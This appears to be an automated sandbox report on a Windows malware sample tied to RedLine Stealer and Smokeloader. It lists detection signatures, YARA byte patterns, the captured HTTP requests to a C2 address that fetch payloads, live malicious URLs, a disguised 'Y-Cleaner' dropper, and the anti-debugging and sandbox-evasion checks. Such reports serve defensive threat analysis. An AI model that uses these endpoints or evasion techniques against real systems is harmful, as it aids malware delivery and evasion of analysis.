Windows Analysis Report
zSmMqGGeVy.exe

Overview

General Information

Sample name:zSmMqGGeVy.exe
renamed because original name is a hash value
Original sample name:83aa26bd8755e994141c4b6d525307ba.exe
Analysis ID:1578937
MD5:83aa26bd8755e994141c4b6d525307ba
SHA1:1cc2485520840247010cd5a2a6f6ba69924a8da5
SHA256:0e5c004b6ac8fd180951d14352e8eb0e4b9b3d4e32dbeaa194a7af7c77d3b4d7
Tags:exe, user-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • zSmMqGGeVy.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\zSmMqGGeVy.exe" MD5: 83AA26BD8755E994141C4B6D525307BA)
    • WerFault.exe (PID: 6320 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_RedLineStealer_ed346e4c
Description: unknown
Author: unknown
Strings:
  • 0x1430:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Smokeloader_3687686f
Description: unknown
Author: unknown
Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: zSmMqGGeVy.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1], ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe, ReversingLabs: Detection: 75%
Source: zSmMqGGeVy.exe, ReversingLabs: Detection: 36%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1], Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe, Joe Sandbox ML: detected
Source: zSmMqGGeVy.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004034C0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E93727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_00E93727
Source: zSmMqGGeVy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EA5F6E FindFirstFileExW,0_2_00EA5F6E
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:55:07 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:55:10 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: Joe Sandbox ViewIP Address: 185.156.73.23 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloadW
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
Source: zSmMqGGeVy.exe, 00000000.00000003.2082365106.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2177142307.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2210483154.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2121506403.0000000005743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download5
Source: zSmMqGGeVy.exe, 00000000.00000002.2600972070.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
Source: zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Source: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: zSmMqGGeVy.exeStatic PE information: section name:
Source: zSmMqGGeVy.exeStatic PE information: section name: .idata
Source: zSmMqGGeVy.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Code function: String function: 00E99E07 appears 35 times
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Code function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 480
Source: zSmMqGGeVy.exe, 00000000.00000003.2261056249.0000000005677000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs zSmMqGGeVy.exe
Source: zSmMqGGeVy.exe, 00000000.00000003.2260777470.0000000005FBA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs zSmMqGGeVy.exe
Source: zSmMqGGeVy.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: zSmMqGGeVy.exe Static PE information: Section: vrjcgfkr ZLIB complexity 0.9899012430680456
Source: classification engine Classification label: mal100.evad.winEXE@2/15@1/1
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Code function: 0_2_00DAA45E CreateToolhelp32Snapshot,Module32First,0_2_00DAA45E
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7332
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File created: C:\Users\user~1\AppData\Local\Temp\VwweWtdD5CJ
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Command line argument: emp 0_2_00408020
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Command line argument: mixtwo 0_2_00408020
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: zSmMqGGeVy.exe ReversingLabs: Detection: 36%
Source: zSmMqGGeVy.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: zSmMqGGeVy.exe String found in binary or memory: 185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: unknown Process created: C:\Users\user\Desktop\zSmMqGGeVy.exe "C:\Users\user\Desktop\zSmMqGGeVy.exe"
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe
Source: zSmMqGGeVy.exe Static file information: File size 1903104 > 1048576
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: zSmMqGGeVy.exe Static PE information: Raw size of vrjcgfkr is bigger than: 0x100000 < 0x1a1000

Data Obfuscation

Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Unpacked PE file: 0.2.zSmMqGGeVy.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vrjcgfkr:EW;zykttmzm:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: zSmMqGGeVy.exe Static PE information: real checksum: 0x1db532 should be: 0x1dab91
Source: zSmMqGGeVy.exe Static PE information: section name:
Source: zSmMqGGeVy.exe Static PE information: section name: .idata
Source: zSmMqGGeVy.exe Static PE information: section name:
Source: zSmMqGGeVy.exe Static PE information: section name: vrjcgfkr
Source: zSmMqGGeVy.exe Static PE information: section name: zykttmzm
Source: zSmMqGGeVy.exe Static PE information: section name: .taggant
Source: zSmMqGGeVy.exe Static PE information: section name: vrjcgfkr entropy: 7.947994555821212
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File created: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File created: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Bunifu_UI_v1.5.3.dll

Boot Survival

Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 98B81C second address: 98B822 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B546C second address: 9B5470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5470 second address: 9B5490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5490 second address: 9B5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5496 second address: 9B54AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B54AE second address: 9B54C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B54C1 second address: 9B54D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B54D6 second address: 9B54DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5616 second address: 9B5643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9DF58A6BD6h 0x0000000a jmp 00007F9DF58A6BDFh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF58A6BE1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9BAC67 second address: 9BAC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9BAC73 second address: 9BAC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0B50 second address: 9C0B78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F9DF4F3601Eh 0x00000010 push eax 0x00000011 jmp 00007F9DF4F3601Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
